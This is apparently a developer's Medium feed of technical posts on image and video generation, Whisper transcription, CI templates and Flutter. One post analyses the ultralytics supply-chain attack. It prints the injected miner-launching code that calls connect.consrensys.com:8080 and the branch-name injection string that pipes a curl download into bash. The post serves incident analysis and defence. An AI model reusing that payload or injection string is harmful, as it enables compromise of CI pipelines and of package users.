Stories by 0517 jhj on Medium

Brief Overview of Stable Diffusion’s Development

0517 jhj — Mon, 03 Feb 2025 17:23:07 GMT

There are so many great image generation models out there these days, like many versions of Stable Diffusion and Flux. In this post, we’ll take a quick look at the different kinds of models used.

Stable Diffusion (LDM)

Stability AI released its open-source Stable Diffusion model in August 2022. This sparked widespread public interest in Gen AI, making image generation technology accessible to the general public.

Stable Diffusion Denosing Process from Wikipedia

Stable Diffusion’s core concept is based on a process of generating noise → and then learning to reverse this process through denoising. The Denoising UNET is the core component of a Latent Diffusion Model (LDM), responsible for the denoising process.

Diagram from High-Resolution Image Synthesis with Latent Diffusion Models, April 2022

The above image illustrates how the image generation works in the Latent Diffusion Model (LDM), the architecture behind the Stability AI’s open-source Stable Diffusion model.

The denoising UNET works with images in a ‘latent space,’ an encoded representation of the image derived from random seeds. Once the UNET finishes denoising, this latent representation is decoded back into a regular image. A Variational AutoEncoder (VAE) is mostly used in Stable Diffusion inference to manage the encoding and decoding of images to and from the latent space.

To incorporate text prompts, a text encoder (CLIP) tokenizes the text and embeds it into numerical values, which are then used during the UNET’s denoising process.

Stability AI has led the open-source community for Stable Diffusion models. Here are some notable open-source releases based on the Latent Diffusion Model (LDM) architecture:

SD 1.5

Released in October 2022 by RunwayML (Mirror link provided as the official repo is no longer available somehow).
Text-to-Image, Image-to-Image, and Inpainting, among other features.
Great ecosystem with many custom fine-tuned models and LoRAs.
Compatibility with ControlNet makes it a powerful for controlling image generation based on specific poses or concepts.

SD 2

Released in November 2022 by Stability AI
Supports 768x768 resolution, an upgrade from the 512x512 resolution of previous versions.
Retrained from scratch on a filtered dataset.

SDXL

Released in July 2023 by Stability AI
Largest SD model in the UNET architecture
Supports 1024x1024 resolution, an upgrade from previous versions.
Great ecosystem with many custom fine-tuned models and LoRAs.

Stable Diffusion (DiT)

DiT architecture from Scalable Diffusion Models with Transformers

The paper “Scalable Diffusion Models with Transformers” (December 2022) introduced the new architecture called DiT for Stable diffusion, which is now used in many SOTA image generation models.

DiT replaces Stable Diffusion’s traditional UNET with transformer blocks for denoising.

The core concept of Stable Diffusion still remains the same: generating noise → learning to reverse this process through denoising. However, while the UNET handled this in the Latent Diffusion Model (LDM), transformer blocks now take on this responsibility in DiT.

Because DiT leverages the transformer’s attention mechanism for denoising, it demands significantly more computing resources. However, this increased computational cost translates to more coherent and detailed outputs.

Here are some notable open-source releases based on the Diffusion Transformer (DiT) architecture:

Flux

Released in October 2024 by Black Forest Labs
Currently SOTA in Text-to-Image leaderboard
Great ecosystem with many custom fine-tuned models and LoRAs.

SD 3.5

Released in October 2024 by Stability AI

Currently, Flux stands out as a SOTA for text-to-image generation among open source models 🎉 :

Text-to-Image leaderboard

If you’re Interested in training your own LoRAs for image generation models, Check out this Jupyter Notebook project:

GitHub - jhj0517/finetuning-notebooks

Reference

Train Your Own LoRA Models for Hunyuan Video and Flux in Google Colab

0517 jhj — Fri, 31 Jan 2025 13:11:05 GMT

By January 2025, we have some pretty good models for generating images and videos. Flux for image generation, and Hunyuan Video for video generation. Let’s take a quick look at what they do.

Flux

Flux is an open-source image generation model from Black Forest Labs.

On the Text-to-Image leaderboard, Flux is the SOTA for image generation among open-source models.

A traditional popular image generation model, Stable Diffusion, uses a UNET to generate image. A UNET is the core component of Stable Diffusion, responsible for generating noise → denoising it to produce the final image.

Stable Diffusion Denosing Process from Wikipedia

Unlike traditional Stable Diffusion, Flux uses a diffusion transformer architecture for image generation, as mentioned in a Black Forest Lab blog post.

You can use natural language as a prompt in Flux. With many SD models, you might have to use a sequence of words separated by commas, like “woman, photo, smile, from front.” However, with Flux, you can use a natural language, such as “A photo of a woman smiling and looking forward.”
In inference pipeline for Flux, this is achieved by loading two CLIP models and using both of their embeddings. For more information on how Flux works, read the official blog post from Black Forest Labs.

If you try to run the full Flux model without any quantization, you’ll likely need quite expensive hardware. But since you can now use the GGUF format, you can simply select the quantized version that best fits your hardware. For example, If you have an RTX 3060 12GB GPU, flux1-dev-Q5_K_S.gguf would fit you most.

Below image is the quality comparison between SD 3.5 vs Flux from mimicpc :

SD 3.5 vs Flux comparison from mimicpc

Hunyuan Video

Hunyuan Video is an open-source video generation model from Tencent.

I couldn’t find a proper text-to-video leaderboard on Hugging Face or elsewhere, so I can’t show you one. But here’s an example generation from Replicate:

Prompt : Dynamic shot racing alongside a steam locomotive on mountain tracks, camera panning from wheels to steam billowing against snow-capped peaks. Epic scale, dramatic lighting, photorealistic detail.

In my opinion, Hunyuan Video is a SOTA model among open source text-to-video generation models. While Hunyuan Video does not yet support image-to-video, there are rumors that this feature may be released in Q1 2025.

Like many SOTA models today, the Hunyuan video also uses a transformer architecture, featuring its own design.

Dual-stream to Single-stream Design from Hunyuan Vdieo

Specifically, they use Dual-stream to Single-stream structure for video generation. In the Dual-stream phase, text and video tokens are processed independently in separate transformer blocks (each stream). Then later, in the Single-stream phase, they are concatenated and fed into subsequent transformer blocks. This design enables the model to learn its own appropriate modulation mechanisms without interference, resulting in better video generation quality.

And since video generation transformers utilize additional information across frames, Hunyuan Video uses a 3D VAE. The 3D VAE works with three dimensions: video length, space, and channels. Their compression ratios are set to 4, 8, and 16, respectively. The use of a 3D VAE significantly reduces the number of tokens for the subsequent diffusion transformer model. For more information on how it works, you can read HunyuanVideo: A Systematic Framework For Large Video Generative Models.

Just like Flux, even if you don’t have enough VRAM, you can still run Hunyuan video models thanks to the the GGUF format. Simply choose the quantized version that best suits your GPU.

Lora

LoRA (Low-Rank Adaptation of Large Language Models) is a popular training technique that can fine-tune model using specific dataset. It works by inserting a smaller number of new weights into the model and only these are trained. Since you only train a small number of parameters from the base model, you can fine-tune using dataset faster, more cheaply, and with greater memory efficiency.

Once you’ve trained the model using LoRA, you’ll have a smaller, adapted model derived from the base model. This smaller LoRA model can be attached and detached to the base model in inference pipeline to get your desired result. That’s what LoRA is designed for.

Because LoRA freezes the original weights of the base model and generates the desired result by inserting a small number of new weights, it offers flexibility and nice scalability. After training a solid base model, you would prefer to have several small LoRA models instead of retraining the entire base model.

Due to its cost-effectiveness, LoRA has become a very popular training technique.

Preparing a Dataset for LoRA Training

The datasets often contain images paired with corresponding text files for captioning.

There’s useful information when training LoRA models with captions, a widely used technique. Let’s take a look by actually training an example LoRA model.

Here’s an example dataset with diffusers/dog-example:

diffusers/dog-example

The dataset consists of 5 images of a puppy. The common feature among these images is that the puppy is sitting, rather than running or playing.

I want to train the model on the puppy itself, not on the concept of a “sitting puppy.” Then How should I do?

A key consideration when captioning images in a dataset is to emphasize features you want the model to learn distinctly. If there’s a specific feature you want to isolate, it’s recommended to caption it more.

For example, let’s say you want to train a Lora for a character that wears a hairpin. If you want the LoRA model to generate images of the character both with and without the hairpin, it’s recommended to include captions that specifically mention the hairpin. This principle also applies to other features, such as clothing, hairstyle, eye color, and so on.

Since I don’t want the LoRA from overfitting to the concept of “sitting,” I should specifically caption the puppy’s seated pose.

To compare the results of using captions for the seated pose versus not using them, I prepared two different datasets.

dog-example-without-sitting

Without “sitting” Captions

2. dog-example-with-sitting

With “sitting” Captions

They’re basically the dataset with the same images. I just made one with “sitting” in the captions and one without. I’ve temporarily named the puppy “A John’s dog” in the dataset. Since this word is used repeatedly in the captions, it will become the “trigger word” for the LoRA model.

After training each LoRA model for 1000 steps, here are some example results generated using these LoRA models with the prompt, “A John’s dog is playing with a ball in the grass.”:

The image on the left was generated using the LoRA model without the “sitting” keyword, while the image on the right used the LoRA model with the “sitting” keyword.

To me, the right image appears less overfitted to the concept of “sitting.”

The seed used was 77. You can regenerate the results or conduct further tests using these LoRA models from here:

https://huggingface.co/jhj0517/A-John_s-dog

A better example would involve a dataset with a character wearing a hairpin, hat, or some other distinctive clothing, if I could find one.

Training LoRA with Colab

To train LoRA models for use with Hunyuan and Flux, I recommend checking out ostris/ai-toolkit and tdrussell/diffusion-pipe. They are great projects for fine-tuning vision generation models.

For convenience, I’ve created Jupyter Notebooks that are compatible with Google Colab.

Colab is Google’s Jupyter notebook hosting service, where you can rent some of Google’s computing resources to run jupyter notebook. There’re few advanges when using Colab :

Free GPU runtime up to 16 GB VRAM ( T4 GPU )
Supports form fields within notebooks, which is very helpful for users who are not comfortable with coding.

Form Fields

In my opinion, Colab is a good way to showcase your projects to those who are not interested in reading the code.

Once you have prepared the dataset, it would be nice to be able to train LoRA models by simply running the cells in order, which is achievable with Jupyter Notebooks.

If you’re interested in Lora training with notebooks, please visit:

GitHub - jhj0517/finetuning-notebooks

Reference

Python Project Template with Basic CI/CD Pipeline on Github

0517 jhj — Fri, 27 Dec 2024 11:46:28 GMT

When you start a new project with your team, it would be good to have some kind of nice template format for your project. For example, a typical CI/CD pipeline workflow or the coding convention documentation for your team’s work. Of course, since it’s just a template to start with, you can edit and add what you want as the project scales.

Creating Github Template Repository would be a good choice to achieve this, it lets you start a new project without repeating redundant things that need to be done again. For example, if your team uses Github as a project management tool, I find it cumbersome to create issues and PR templates every time I start a new project. So I’ve created a basic python template that anyone can use. We’ll look at those basic components of it in this post.

Github Actions

There’re basic CI/CD pipelines if you have it on Github when starting python project.

CI with pytest

https://medium.com/media/a3d4063ba9baebc47cd2bc39112da36f/href

Typically, you would have test/ directory on your project to run tests. If you have automated CI pipeline that runs python -m pytest tests everytime the commit/PR happens on master branch, that would give you better experience to your development.

Note: I added “Clean up space for action” step because free github action has disk space limitation. I’ve experienced lack of disk space error when installing heavy packages (e.g. torch), this step will resolve those cases.

2. CD for DockerHub ( Optional )

https://medium.com/media/61f98dbb3394f909c706276e002738dd/href

This is optional, only if you would have a Dockerfile for your project. The action is the pipeline for automated Dockerfile building/pushing to the DockerHub. If the process of Dockerfile building/pushing to the server is automated, you would love it for its convenience. I’ve set the auto-trigger with commits to the master branch, but you can update it in other ways, for example making release on your repository.

Since it needs DockerHub secrets from your repository to push the image, you need to register and use secrets from your repository. You can register secrets as envioronmental variables, in “Settings — Secrets and variables — Actions” tab.

Github Action Secrets

3. CD for PyPI Package ( Optional )

https://medium.com/media/77f7257320d8cedbea57adad42717eca/href

This is also optional, only if your project is for the PyPI package. Whenever you make “release” on your repository, it will automatically build / push it to the PyPI as a package. All you have to do is edit pyproject.toml and setup.py as your project needs. The auto-triggering of all optional workflows is disabled by default, so you can enable it only when you need it.

Issues & PR templates

You would have your own issues & PR templates for your project. If you have to make them everytime when you start a new project, it would definitely cumbersome.

You can create issue templates by placing markdown files in the .github/SSUE_TEMPLATE directory. Typically you would have “bug report” and “feature request” as issue templates for the base. These are the example markdown files.

---
name: Bug report
about: Create a report to help us improve
title: ''
labels: bug
assignees: ''
---

**Which OS are you using?**
 - OS: [e.g. Linux or Windows]

---
name: Feature request
about: Any feature you want
title: ''
labels: enhancement
assignees: ''
---

**Describe feature you want**

You can create a template for PR as well by placing .github/ull_request_template.md file. This is the example PR template file:

## Related issues / PRs. Summarize issues.
- #

## Summarize Changes
1.

Of course, you can edit or add to them as needed for your project.

Directory Strucutre

The final directory structure would look like this. Directories with (optional) are literally optional, you can remove them if you don’t need them.

python-project-template/    
├── .github/                # GA workflows & PR, Issue templates
├── docker/                 # (optional) Dockerfile & docker-compose files related to the project.  
├── tests/                  # Test codes with pytest
├── .gitignore              # gitignore file 
├── README.md               # README file
├── pyproject.toml          # (optional) PyPI package configuration file
├── setup.py                # (optional) PyPI package setup file
└── requirements.txt        # Project dependencies

Quick Start

Once you have created a template repository, you can enable it to be used as a template. Go to the “Settings — General” tab and check the “Template repository” checkbox.

“Template repository” Checkbox

Then the “Use this template” button will be appeared, you can use it as a template now.

Click “Create a new repository” Button to use the Template.

I’ve created a template repository that anyone can use with a basic CI/CD pipeline and files. You can edit, remove or add anything as your project needs. If you’re interested, please visit:

GitHub - jhj0517/python-project-template: Template repository for python project

Reference

Shell Injection Attack on Open Source Project with +33k Stars on Github

0517 jhj — Fri, 06 Dec 2024 20:34:16 GMT

On 2024–12–05, There was an attack on ultralytics, and it was successful.

Ultralytics is widely used pakcage for object detection and segmentation, especially in many AI projects. Today, 2024–12–07, it has +33k stars on Github. One of my project also uses the package.

The attacker was openimbot, and managed to successfully embed this code into the ultralytics project:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

What it does?

It gets permission to make file executable with os.chmod.
It executes a command to connect to connect.consrensys.com:8080, which is probably running a cryptomining job. But it’s not just a cryptomining malware.
It installs another malicious executable file into the path.
After the file is executed, it deletes the file to remove the evidence.

Since it also executes the malicious file, not just running a crypto mining job, it could be full blown infostealer malware or whatever. So I think we can say that its severity is very high.

How did the attacker get this code in? Here’s the sequence of events:

Sequence of Events ( UTC Time )

2024–12–04 19:33
- The attacker, openimbot made PR #18018
2024–12–04 19:57
- The attacker, openimbot made PR #18020
2024–12–04 20:50
- The malicious version v8.3.41 was released on PyPI by Github Action
2024–12–05 06:34
- The compromised version noticed in issue
2024–12–05 09:15
- The v8.3.41 has been removed from PyPI
2024–12–05 12:46
- The malicious version v8.3.42 was released on PyPI by Github Action
2024–12–05 13:47
- The v8.3.42 has been removed from PyPI
2024–12–05 19:09
- The ultralytics team member, glenn-jocher made PR #18052
2024–12–05 19:47
- The safe version v8.3.43 was released on PyPI by Github Action

How?

In PR #18018 and PR #18020, the attacker was able to trigger a Github Action for the CI/CD pipeline with malware via command injection.

It works the same as SQL Injection, that is inject the string of the commands and somehow it actually executes them. It’s very simple and easy to prevent also, but if it’s successful to do it, it can be very critical because it literally executes the command.

The details of how this was possible are well written in the Github Advisory Report, which already reported this vulnerability prior to this attack.

The key point that the attacker has used is the echo of the shell in the workflow in the Action:

run:
    echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"

While some of you, at least me, might think that using echo in shell script is no big deal, like it’s just for logging like print. But if you’re doing something with infrastructure-related things like Github Action, and you’re able to use shell script there, echo needs to be used carefully, as it can potentially execute code with the Command Substitution syntax $(...) in the shell.

In short, this is what the attacker did:

echo $((1+2))
# prints 3

There was a line of echo “${{ github.event.pull_request.head.ref }}” in the Github Action, and the attacker got the full control of the terminal in the action with its PR branch name.

This was the branch name used by the attacker in PR #18018 :

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

This downloads and executes custom shell script file. And it triggered the deployment of the malicious version of the package. The malicious versions v8.3.41 and v8.3.42 were successfully released and listed on PyPI for more than 12~ hours.

PyPI Administrator provided the timeline of the releases, People who installed ultralytics between 2024–12–04 20:51 ~2024–12–05 09:15 and 2024–12–05 12:47 ~ 2024–12–05 13:47 (The times are in UTC) were likely infected by the dangerous malware.

What to do & Things to learn

Report to Github Advisory. Github Advisory is where people report things exactly like this. Each submission is reviewed by the GitHub Security Lab curation team, rated for severity, and published to the DB.
Since one of my projects uses this package as well, notify them all as much as possible. People who may have installed the ultralytics between 2024–12–04 20:51 ~2024–12–05 09:15 and 2024–12–05 12:47 ~ 2024–12–05 13:47 are likely infected with malware. Since it’s a really popular package that many people use, it’s worth notifying people.
I made an issue about it and pinned it: https://github.com/jhj0517/AdvancedLivePortrait-WebUI/issues/19
I think it could have been prevented much earlier because the vulnerability was reported in the Github Advisory long before the attack — GHSA-7x29-qqmq-v6qc.
Reading the Github Advisory can sometimes help you secure your project.

Reference

Audio Pre-Processings For Better Results in the Transcription Pipeline

0517 jhj — Sun, 29 Sep 2024 12:58:28 GMT

Whisper is currently the state-of-the-art speech-to-text model.

Whisper Architecture

Robust Speech Recognition via Large-Scale Weak is proposed by Alec Radford, Jong Wook Kim, Tao Xu, Greg Brockman, Christine McLeavey, Ilya Sutskever.
The model is implemented as an encoder-decoder transformer. Whisper is trained on 680K hours of labeled multilingual audio data. During transcription, the audio is split into 30-second chunks, and each chunk is fed into the model.

For more information on the architecture of the Whisper, see the paper link above.

Since Whisper was open-sourced in 2022, many applications have appeared to use it. From just transcribing for video subtitles to using it as part of a speech-to-speech pipeline, etc.

Ideally, Whisper could have been trained on less dirty audio (no background music and less noise in the audio), as this type of noise in the input audio often causes hallucinations.

As you can see in the Whisper-WebUI Issue, the most common hallucination in the Whisper is the repetition of some specific word and transcription gets stuck at some specific part. Or if the transcription starts too early.

[00:00.000 --> 00:02.000]  You
[00:30.000 --> 00:32.000]  You
[01:00.000 --> 01:02.000]  You
[01:30.000 --> 01:32.000]  You
[02:00.000 --> 02:02.000]  You
[02:30.000 --> 02:32.000]  You
[03:00.000 --> 03:02.000]  You
[03:08.000 --> 03:10.000]  You
[03:16.000 --> 03:18.000]  You
[03:18.000 --> 03:20.000]  You
[03:29.000 --> 03:31.000]  You
[03:31.000 --> 03:33.000]  You
[03:42.000 --> 03:44.000]  You
[03:44.000 --> 03:46.000]  You
[03:46.000 --> 03:48.000]  You
[03:59.000 --> 04:01.000]  You

This type of hallucination typically occurs when the audio has such noise. To reduce such hallucinations, some pre-processing can be applied to the audio. There are some good repositories to use whisper for better result with lower WER (World Error Rate) and faster transcription speed in the github.

For example, faster-whisper, which implemented whisper with CTraslate2 for better transcription speed and efficient VRAM usage, uses Silero VAD to detect only human voices from the audio.

VAD (Voice Activity Detection) is the most common pre-processing technique used in transcription pipeline. It gives pretty decent result than not using it. In faster-whisper, VAD is implemented by first removing all non-voice segments, feeding only the detected voice to Whisper, and then restoring the original timestamps in the transcription pipeline.

Really good thing about the VAD is that it’s super light and fast. According to the Silero VAD, one chunk of audio (30 seconds) takes less than 1 millisecond to process on a single CPU thread.

Due to the fact that it can use CPU for inference and is still super fast and lightweight, you can attach a VAD to transcription pipeline without any load.

I’ve tried to run some benchmarks to see how effective VAD is in the transcription pipeline, but it’s difficult to find a suitable dataset for such a task. Many ASR datasets like LibriSpeech or TEDLIUM are already cleaned without much noise and are just speech audio files within 2~10 seconds. Using VAD on already cleaned audio will only result in the same WER (World Error Rate) in a transcription pipeline before and after VAD.

Same WER with LibriSpeech-other

Although LibriSpeech-other has more noise than other ASR datasets, it doesn’t have enough “dirty” audio to test something like this. To benchmark such a thing, the audio should be as dirty as possible with the reference transcription. I couldn’t find any suitable datasets for this. So instead of ASR datasets, the best thing to do was to pick some real-world samples and compare them.

Let’s take a look at the real world example of Whisper causing hallucinations due to noise. Here’s the 1 minute 30 second sample from The Joe Schmo Show (2003).

Any TV show or movie scene would be a good audio sample with noise, because we often face audio with such noise in the real world. The sample has a long time of the low pitch of the sound from about 0:03 ~ 1:05, almost about 1 minute, to add continuous tension to the show.
Such continuous noise often causes hallucinations in the Whisper because the model is easily confused as to whether it is a human voice or not. That’s why VAD works so well in the transcription pipeline.

This is a human-made, error-free transcription of the sample:

1
00:00:00,000 --> 00:00:02,000
First Flame of Love Eviction Ceremony.

2
00:01:09,659 --> 00:01:10,659
Love.

3
00:01:11,659 --> 00:01:12,659
It's why we're all here.

4
00:01:13,659 --> 00:01:14,659
But tonight,

5
00:01:15,659 --> 00:01:17,659
one of you will have to let go of love's warm bosom

6
00:01:17,659 --> 00:01:20,659
and cleave to rejection's cold shoulders.

7
00:01:21,659 --> 00:01:23,659
Welcome to the first

8
00:01:23,659 --> 00:01:24,659
Flame-

9
00:01:24,659 --> 00:01:26,659
Coming up next on Joe Schmoe 2,

10
00:01:26,659 --> 00:01:28,659
the most shocking eviction yet.

11
00:01:28,659 --> 00:01:29,659
Welcome to the-

And this is the transcription using Whisper large-v2:

1
00:00:00,000 --> 00:00:02,000
first Flame of Love Eviction Ceremony.

2
00:00:03,879 --> 00:00:13,880
♪♪

3
00:00:13,880 --> 00:00:23,879
♪♪

4
00:00:23,879 --> 00:00:33,879
♪♪

5
00:00:33,879 --> 00:00:43,899
♪♪

6
00:00:43,899 --> 00:00:53,899
♪♪

7
00:00:53,899 --> 00:01:03,920
♪♪

8
00:01:03,920 --> 00:01:13,920
♪♪

9
00:01:13,920 --> 00:01:23,939
♪♪

10
00:01:23,939 --> 00:01:25,939
Coming up next on Joe Schmoe II,

11
00:01:25,939 --> 00:01:27,939
the most shocking eviction yet.

12
00:01:27,939 --> 00:01:29,939
Welcome to the...

For the hyperparameters, I used all the defaults from faster_whisper.transcribe().

Interestingly, the noise part was transcribed with ♪♪. This may indicate that there were labels for the music as well, not just speech transcription in the Whisper training data. This transcription is missing a few lines. Right after the noise part, some lines were simply skipped and not transcribed.

Let’s use VAD to improve this :

1
00:00:00,000 --> 00:00:03,000
Welcome to the first Flame of Love Eviction Ceremony.

2
00:01:14,629 --> 00:01:18,629
But tonight, one of you will have to let go of love's warm bosom

3
00:01:18,629 --> 00:01:21,629
and cleave to rejection's cold shoulder.

4
00:01:22,629 --> 00:01:24,629
Welcome to the first Flame...

5
00:01:24,629 --> 00:01:26,629
Coming up next on Joe Schmoe II,

6
00:01:26,629 --> 00:01:29,629
the most shocking eviction yet.

The most problematic noise part, ♪♪ part ( 1 minute of noise ) has been removed by VAD. We may be able to say that the result is better than not using it. But compared to human transcription, there are still a few lines missing right after the noise.

That’s because VAD also causes hallucinations from noise, not just the Whisper. If you attach submodels to the pipeline to get a better result, it could sometimes give you a worse result because submodels also cause hallucinations.
Unfortunately, VAD couldn’t catch some lines right after the noise, resulting in some missing lines.

Would tweaking some of the VAD hyperparameters, such as lowering min_speech_duration_ms, help it detect some missing lines? :

1
00:00:00,000 --> 00:00:02,000
Welcome to the first Flame of Love Eviction Ceremony.

2
00:00:04,000 --> 00:01:10,659
Love.

3
00:01:11,659 --> 00:01:12,659
It's why we're all here.

4
00:01:13,659 --> 00:01:14,659
But tonight,

5
00:01:15,659 --> 00:01:17,659
one of you will have to let go of love's warm bosom

6
00:01:17,659 --> 00:01:20,659
and cleave to rejection's cold shoulder.

7
00:01:21,659 --> 00:01:22,659
Welcome to the first

8
00:01:23,659 --> 00:01:24,659
Flame-

9
00:01:24,659 --> 00:01:26,659
Coming up next on Joe Schmoe 2,

10
00:01:26,659 --> 00:01:28,659
the most shocking eviction yet.

11
00:01:28,659 --> 00:01:29,659
Welcome to the-

It caught some missing lines, but at the same time made another hallucination. From 00:04 ~ 01:10, almost 1 minute of the noise is also detected as a voice, resulting in just saying “Love” for a whole 1 minute.

So tweaking such a hyperparameter is also a challenging to improve such a result, because it also produces unexpected hallucinations like this.

The best way to do this would be to simply remove noise from the audio, separating vocals from other noise.

There’s a really cool open source project for this, ultimatevocalremovergui.

ultimatevocalremovergui is currently the state-of-art open source voice and noise separation tool available. Different types of models like MDX, Demucs are integrated in the repository and it has its own pipeline that uses all the models for better result.

Although I haven’t tested all of the UVR models, the ones I find most useful for the transcription pipeline are the MDX models. While other models, such as Demucs, focus on separating all instruments from the music, such as bass or drums, MDX models support a vocals-only separation option that’s faster and lighter, and may be best suited for the transcription pipeline.

Here’s the result with the UVR-MDX-NET-Inst_HQ_4 model from the UVR and VAD together:

1
00:00:00,000 --> 00:00:02,000
Welcome to the first Flame of Love Eviction Ceremony.

2
00:01:09,659 --> 00:01:10,659
Love.

3
00:01:11,659 --> 00:01:12,659
It's why we're all here.

4
00:01:13,659 --> 00:01:14,659
But tonight,

5
00:01:15,659 --> 00:01:17,659
one of you will have to let go of love's warm bosom

6
00:01:17,659 --> 00:01:20,659
and cleave to rejection's cold shoulders.

7
00:01:21,659 --> 00:01:23,659
Welcome to the first

8
00:01:23,659 --> 00:01:24,659
Flame-

9
00:01:24,659 --> 00:01:26,659
Coming up next on Joe Schmoe 2,

10
00:01:26,659 --> 00:01:28,659
the most shocking eviction yet.

11
00:01:28,659 --> 00:01:29,659
Welcome to the-

It showed most accurate transcription compared to others. It didn’t affect by long time of the noise, didn’t miss few lines. Just added unnecessary “Welcome to the” in the first line at the front. Using UVR gives the best result so far.

For Joe Shomo Show 2, this is the WER chart:

WER Benchmark on Joe Schmo Show

Adding UVR to the transcription pipeline also reduced the WER on LibriSpeech-other:

WER Benchmark on LibriSpeech-other

Picovoice/speech-to-text-benchmark is used to benchmark. It wasn’t significantly reduced because the ASR dataset is already clean and is already close to almost perfect data to transcribe, but if you try with real-world examples like the TV show above, you could often get much better results with UVR.

The disadvantage of the using UVR MDX model compared to Silero VAD is that it uses GPU ( siginficantly slow in CPU ) and is not as light as VAD. With UVR-MDX-NET-Inst_HQ_4, it needed about ~9GB VRAM. And it increases transcription time.

RTF Benchmark on LibriSpeech-other

In terms of RTF ( Real Time Factor — Processing time / Audio time ), Using VAD and UVR together in the transcription pipeline increased the transcription time by about 2.5 times compared to not using them. Because UVR requires the GPU and increases transcription time, it’s not as easy to add to the transcription pipeline as VAD.

But if your main interest is in lowering WER and reducing hallucinations rather than faster transcription, it’s definitely worth getting into the transcription pipeline. For example, it works well when you are transcribing movie subtitles.

When attaching submodels that use GPU to the pipeline, it is recommended to implement the opt-in feature to offload submodels to the pipeline after inference because you might get a CUDA OutOfMemoryError.

Currently in Whisper-WebUI the transcription pipeline is implemented as follows:

Whisper WebUI Transcription Pipeline

Because music separation increases processing time significantly, it would not be appropriate to use it in a real-time transcription pipeline such as a speech-to-speech conversation. However, if music separation models as lightweight as VAD become available in the future, it would be worthwhile to use them as submodels in the real-time transcription pipeline as well.

Reference

MusePose: Transform an Image into a Dancing Video

0517 jhj — Thu, 13 Jun 2024 14:33:31 GMT

MusePose is a Generative AI project that transforms an image into a dancing video. Models and codes are published on HuggingFace and Github, so you can try now if you want. But models are only available for non-commercial research purposes.

Example Output From The MusePose

Here’s the demo example shown in the repo. It takes 1) image 2) dancing skeleton as inputs and returns a dancing image based on them. Basically, MusePose works through a two-step process.

Step1 : Align Skeletons from Input Image & Video

Example Output From Step1

Red numbers in the example above indicate each input and output in this step.

Cell 1 → Cell 2
Extract skeleton from the input image
Cell 4 → Cell 5
Extract skeleton from the input dance video
Cell 5 → Cell 3
Align (Resize) the skeleton video (Cell 5) to the skeleton image (Cell 2).

So getting Cell 3 is the purpose of the step 1.

This process is done with DWPose and requires two types of models.

yolox_l_8x8_300e_coco.pth
- YoloX model to detect person from the image
dw-ll_ucoco_384.pth
- DWPose model to extract skeleton from the image

It uses less VRAM and less time than step 2 later.

Step2: Make The Image Move with The Aligned Skeleton

Example Output From Step2

Now that you have a properly aligned skeleton from step 1. In step 2, it makes the image move with it. This step goes through quite heavy work and loads 7 models in total.

According to the repository, these models are loaded during the step 2 :

From denoising_unet.pth to reference_unet.pth, the top four are specifically trained models for the MusePose. Other models are used to help generate images according to the result of these four models.

As long as it loads 7 models, it needs some VRAM. With torch.float16 dtype it needs at least ~17GB for this step. You can set width and height of how this process will procceed through what resolution, so lowering this resolution would be helpful to use less VRAM, and increasing resolution as close as to input source would be helpful to get better result but it costs you more VRAM.

You can set the image resolution as a parameter, which determines how this process will go through in this step, so lowering the resolution would be helpful if you get CUDA errors. But it’s likely to get a worse result if there’s a lot difference with the original input source.

MusePose Demos You Can Try

Here’re you can try MusePose.

ComfyUI-MusePose
- ComfyUI custom node
stable-diffusion-webui-MusePose
- SD WebUI Extension
MusePose-WebUI
- Gradio WebUI dedicated for MusePose. It supports Huggingface Space & Colab Notebook you can try.

Reference

Compressing Image in Flutter

0517 jhj — Thu, 23 May 2024 15:29:28 GMT

There’re two ways to compress the image in Flutter.

Fortunately, there is someone who has already tested these packages in the stackoverflow post. The test was done 4 years ago, but I found that flutter_image_compress is still the best and most efficient way to compress the image in Flutter, thanks to the post. Here’s my results with flutter_image_compress :

Results

100% (2.07 MB)

2.07 MB image from Unsplash

This is the original image without any compression.

2. 95% (803 KB)

803KB

When I decreased the image quality by only 5%, the size was compressed by more than 50%, 2MB → 803KB. The flower still looks the same, but the grey on the background is a little bit noticeable.

2. 50% (319KB)

319KB

The image was compressed significantly, 2MB → 300KB. About the changes: The gray gradation on the background is noticeable, but the flower still looks the same.

3. 10% (99.4KB)

99KB

The gray gradation on the background became more noticeable. At 10% quality, you can see a little blur on the flower if you look closely.

4. 5% (60KB)

60KB

Now the image is only 60KB and quite corrupted.

The default value of the image quality is 95% in the compressAndGetFile(). It only decrease by 5% of the image, but it showed decent compression ratio when it comes to the size, from 2MB → 803KB. And images look the same up to 50% in my opinion. I believe this is really useful package if you need to compress the image in the Flutter.

Implementation in Flutter

Add flutter_image_compress in the pubspec.yaml :

dependencies:
  flutter_image_compress: ^2.3.0

You can compress it to the temp directory and then handle the image there:

import 'package:flutter_image_compress/flutter_image_compress.dart';
import 'package:path/path.dart' as p;
import 'dart:io';

static Future compressImage({
  required File imageFile,
  int quality=95,
  CompressFormat format=CompressFormat.jpeg,
}) async {
  final String targetPath = p.join(Directory.systemTemp.path, 'temp.${format.name}');
  final XFile? compressedImage = await FlutterImageCompress.compressAndGetFile(
    imageFile.path,
    targetPath,
    quality: quality,
    format: format
  );

  if (compressedImage==null){
    throw ("Failed to compress the image");
  }

  return compressedImage;
}

You can also specify the format of the image like CompressFormat.jpeg or CompressFormat.png ..etc. Usually JPEG is the way to go because it has the best resolution for the same size of the image.

Sample Usage App

If you want to see the code of the sample usage app above, please visit:

flutter-samples/compress_image at master · jhj0517/flutter-samples

Reference

dart — Flutter the best way to compress image — Stack Overflow

How to Modify PNG Chunk Metadata in Flutter

0517 jhj — Tue, 21 May 2024 14:09:48 GMT

Why Do I Need to Edit PNG Chunk Metadata

In the open source LLM community, there are many open source projects you can use. For example, open-webui, text-generation-webui, TavernAI… etc. These open source projects let you explore LLM by running a local model or using a remote API like the OpenAI API. All these open source projects are beautiful ingredients for the future of LLM.

